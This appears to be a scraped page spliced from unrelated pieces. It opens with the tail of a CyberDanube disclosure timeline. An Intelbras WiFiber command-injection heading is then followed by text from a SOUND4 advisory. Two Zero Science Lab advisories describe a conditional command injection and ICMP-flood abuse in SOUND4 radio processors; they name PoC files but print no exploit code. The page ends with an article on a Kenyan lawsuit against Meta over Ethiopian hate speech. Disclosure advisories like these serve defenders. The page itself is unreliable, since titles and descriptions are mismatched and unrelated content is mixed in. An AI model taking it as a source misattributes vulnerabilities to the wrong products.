Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Intelbras WiFiber 120AC inMesh 1.1-220216 Command Injection

This vulnerability allows a local authenticated user to create a file in the /tmp directory that contains malicious commands. The file must have the filename ending with .traceroute.pid, and the commands in the file can only be executed once by an external unauthenticated attacker. By calling the vulnerable script and making a single HTTP POST request, the attacker can gain command execution on the system. After the request is made, the file containing the malicious commands will be deleted.

Title: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command Injection  
Advisory ID: ZSL-2022-5740  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 14.12.2022

**Summary**

The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper

**Description**

This vulnerability allows a local authenticated user to create a file in the /tmp directory that contains malicious commands. The file must have the filename ending with .traceroute.pid, and the commands in the file can only be executed once by an external unauthenticated attacker. By calling the vulnerable script and making a single HTTP POST request, the attacker can gain command execution on the system. After the request is made, the file containing the malicious commands will be deleted.

**Vendor**

SOUND4 Ltd. - https://www.sound4.com | https://www.sound4.biz

**Affected Version**

FM/HD Radio Processing:  
Impact/Pulse/First (Version 2: 1.1/2.15)  
Impact/Pulse/First (Version 1: 2.1/1.69)  
Impact/Pulse Eco 1.16  
Voice Processing:  
BigVoice4 1.2  
BigVoice2 1.30  
Web-Audio Streaming:  
Stream 1.1/2.4.29  
Watermarking:  
WM2 (Kantar Media) 1.11

**Tested On**

Apache/2.4.25 (Unix)  
OpenSSL/1.0.2k  
PHP/7.1.1  
GNU/Linux 5.10.43 (armv7l)  
GNU/Linux 4.9.228 (armv7l)

**Vendor Status**

\[26.09.2022\] Vulnerability discovered.  
\[30.09.2022\] Vendor contacted.  
\[13.12.2022\] No response from the vendor.  
\[14.12.2022\] Public security advisory released.

**PoC**

sound4\_traceroute\_cmdinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[14.12.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x (traceroute.php) Conditional Command Injection

The application allows an unauthenticated attacker to send network signals to an arbitrary target host that can be abused in an ICMP flooding attack. This includes the utilisation of the ping, traceroute and nslookup commands through ping.php, traceroute.php and dns.php respectively.

Title: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood Attack  
Advisory ID: ZSL-2022-5728  
Type: Local/Remote  
Impact: DoS  
Risk: (3/5)  
Release Date: 14.12.2022

**Summary**

The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper

**Description**

The application allows an unauthenticated attacker to send network signals to an arbitrary target host that can be abused in an ICMP flooding attack. This includes the utilisation of the ping, traceroute and nslookup commands through ping.php, traceroute.php and dns.php respectively.

**Vendor**

SOUND4 Ltd. - https://www.sound4.com | https://www.sound4.biz

**Affected Version**

FM/HD Radio Processing:  
Impact/Pulse/First (Version 2: 1.1/2.15)  
Impact/Pulse/First (Version 1: 2.1/1.69)  
Impact/Pulse Eco 1.16  
Voice Processing:  
BigVoice4 1.2  
BigVoice2 1.30  
Web-Audio Streaming:  
Stream 1.1/2.4.29  
Watermarking:  
WM2 (Kantar Media) 1.11

**Tested On**

Apache/2.4.25 (Unix)  
OpenSSL/1.0.2k  
PHP/7.1.1  
GNU/Linux 5.10.43 (armv7l)  
GNU/Linux 4.9.228 (armv7l)

**Vendor Status**

\[26.09.2022\] Vulnerability discovered.  
\[30.09.2022\] Vendor contacted.  
\[13.12.2022\] No response from the vendor.  
\[14.12.2022\] Public security advisory released.

**PoC**

sound4\_icmp\_flood.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[14.12.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x (ping/traceroute) ICMP Flood Attack

The suit claims the company lacks adequate moderation to prevent widespread hate speech that has led to violence and death.

On November 3, 2021, Meareg Amare, a professor of chemistry at Bahir Dar University in Ethiopia, was gunned down outside his home. Amare, who was ethnically Tigrayan, had been targeted in a series of Facebook posts the month before, alleging that he had stolen equipment from the university, sold it, and used the proceeds to buy property. In the comments, people called for his death. Amare’s son, researcher Abrham Amare, appealed to Facebook to have the posts removed but heard nothing back for weeks. Eight days after his father’s murder, Abrham received a response from Facebook: One of the posts targeting his father, shared by a page with more than 50,000 followers, had been removed.

"I hold Facebook personally responsible for my father's murder," he says.

Today, Abrham, as well as fellow researchers and Amnesty International legal adviser Fisseha Tekle, filed a lawsuit against Meta in Kenya, alleging that the company has allowed hate speech to run rampant on the platform, causing widespread violence. The suit calls for the company to deprioritize hateful content in the platform’s algorithm and to add to its content moderation staff.

“Facebook can no longer be allowed to prioritize profit at the expense of our communities. Like the radio in Rwanda, Facebook has fanned the flames of war in Ethiopia,” says Rosa Curling, director of Foxglove, a UK-based nonprofit that tackles human rights abuses by global technology giants. The organization is supporting the petition. “The company has clear tools available—adjust their algorithms to demote viral hate, hire more local staff and ensure they are well-paid, and that their work is safe and fair—to prevent that from continuing.”

Since 2020, Ethiopia has been embroiled in civil war. Prime Minister Abiy Ahmed responded to attacks on federal military bases by sending troops into Tigray, a region in the country’s north that borders neighboring Eritrea. An April report released by Amnesty International and Human Rights Watch found substantial evidence of crimes against humanity and a campaign of ethnic cleansing against ethnic Tigrayans by Ethiopian government forces. 

Fisseha Tekle, Amnesty International's lead Ethiopia researcher, has further implicated Facebook in propagating abusive content, which, according to the petition, endangered the lives of his family. Since 2021, Amnesty and Tekle have drawn widespread rebuke from supporters of Ethiopia’s Tigray campaign—seemingly for not placing the blame for wartime atrocities squarely at the feet of Tigrayan separatists. In fact, Tekle’s research into the countless crimes against humanity amid the conflict fingered belligerents on all sides, finding the separatists and federal Ethiopian government mutually culpable for systematic murders and rapes of civilians. Tekle told reporters during an October press conference: “There’s no innocent party which has not committed human rights violations in this conflict.”

In a statement Foxglove shared with WIRED, Tekle spoke of witnessing “firsthand” Facebook’s alleged role in tarnishing research aimed at shining a light on government-sponsored massacres, describing social media platforms perpetuating hate and disinformation as corrosive to the work of human rights defenders.

Facebook, which is used by more than 6 million people in Ethiopia, has been a key avenue through which narratives targeting and dehumanizing Tigrayans have spread. In a July 2021 Facebook post that remains on the platform, Prime Minister Ahmed referred to Tigrayan rebels as “weeds” that must be pulled. However, the Facebook Papers revealed that the company lacked the capacity to properly moderate content in most of the country’s more than 45 languages. 

Leaked documents shared by Facebook whistleblower Frances Haugen show that parent company Meta's leadership remained well-informed of the platform's potential for exacerbating political and ethnic violence throughout the Tigray war, earning Ethiopia special attention at times from the company's premiere risk and response team. By at least 2021, the documents show, conflict in the country had raised enough alarms to warrant the formation of a war-room-like operation known as an IPOC, a process Facebook created in 2018 to respond rapidly to political "crisis moments." 

Relative to its usual content moderation processes, IPOC is viewed internally as a scalpel, deployed not only to anticipate emerging threats but triage cases of "overwhelming abuse" spurred on by political flash points. This includes the use of so-called "break the glass" measures: dozens of "levers" IPOC teams can deploy during exceptionally inciteful events to quell spikes in hate speech on the platform. In the US, for instance, this included the November 2020 election and subsequent attack on the US Capitol. 

In testimony before the US Senate last fall, Haugen likened the violence in Ethiopia to the genocide of more than 25,000 Rohingya Muslims in Myanmar, war crimes for which Facebook has been internationally condemned for its role in instigating, by the United Nation's Human Rights Council, among others. "What we saw in Myanmar and are now seeing in Ethiopia are only the beginning chapters of a story so terrifying no one wants to read the end of it," Haugen, a former Facebook product manager, told lawmakers. 

As late as December 2020, Meta lacked hate speech classifiers for Oromo and Amharic, two of the major languages spoken in Ethiopia. To compensate for its inadequate staff and in the absence of classifiers, Meta’s team searched for other proxies that would allow them to identify dangerous content, a method known as network-based moderation. But the team struggled because they found, for reasons not immediately clear, that Ethiopian users were far less likely to perform actions that Facebook had long used to help detect hate speech, which included the appearance of too many "angry" face reactions. One internal proposal suggested ditching this model entirely, replacing it instead with one that lends greater weight to other "negative" actions, such as users un-liking pages or hiding posts. It's not clear from the documents whether the proposal was accepted.

In its 2021 roadmap, Meta designated Ethiopia as a country in “dire” risk of violence, and in an assessment of the company’s response to violent and inciting content, it ranked its own capacity in Ethiopia as a 0 out of 3. Yet, in another document, a Meta staff member acknowledged that the company lacked “human review capacity” for Ethiopia in the run-up to the country’s elections. 

The petitioners have asked the high court to issue a declaration naming Meta responsible for violating a slate of basic rights guaranteed under Kenya’s Constitution of 2010: the right to freedom of expression and association; the right not to be subjected to violence or have information about one’s family or private affairs unnecessarily publicized; and the right to equal protection under the law, among others. Moreover, the petitioners have asked the court to order the establishment of a victims' fund of over $2 billion, with the court itself dispersing the funds on a case-by-case basis. Lastly, they’ve asked the court to compel Facebook to declare that its algorithms will no longer promote inciteful, hateful, and dangerous content and demote it wherever found, in addition to rolling out new crisis mitigation protocol “qualitatively equivalent to those deployed in the US,” for Kenya and all other countries whose content Meta moderates from Nairobi. 

“Kenya is the content moderation hub for posts in Oromo, Tigrinya, and Amharic. These are the only three Ethiopian languages, out of the 85 spoken in the country, that Facebook’s current content moderators can even attempt to cover,” says Curling. “There are currently 25 Facebook content moderators working on Ethiopian-related content for a country of 117 million people. Decisions by these individuals, forced to work in awful and unfair conditions, about what posts are taken down and what remains online are taken in Kenya, and it is the Kenyan courts, therefore, that need to determine both men’s legal challenge.”

Meta spokesperson Sally Aldous told WIRED that hate speech and incitement to violence are against the company’s policies. “Our safety and integrity work in Ethiopia is guided by feedback from local civil society organizations and international institutions,” she says. “We employ staff with local knowledge and expertise, and continue to develop our capabilities to catch violating content in the most widely spoken languages in the country, including Amharic, Oromo, Somali, and Tigrinya.” 

Aldous did not address whether the company has more than 25 moderators focused on the country and whether the company has an IPOC team focused on the conflict in Tigray, beyond the country’s election cycles.

Meanwhile, in the wake of his father’s death, Amare and his family were forced to flee their home. He is currently awaiting the outcome of his asylum claim in the United States.

“Every dream we had collapsed,” he says.

Tag

#acer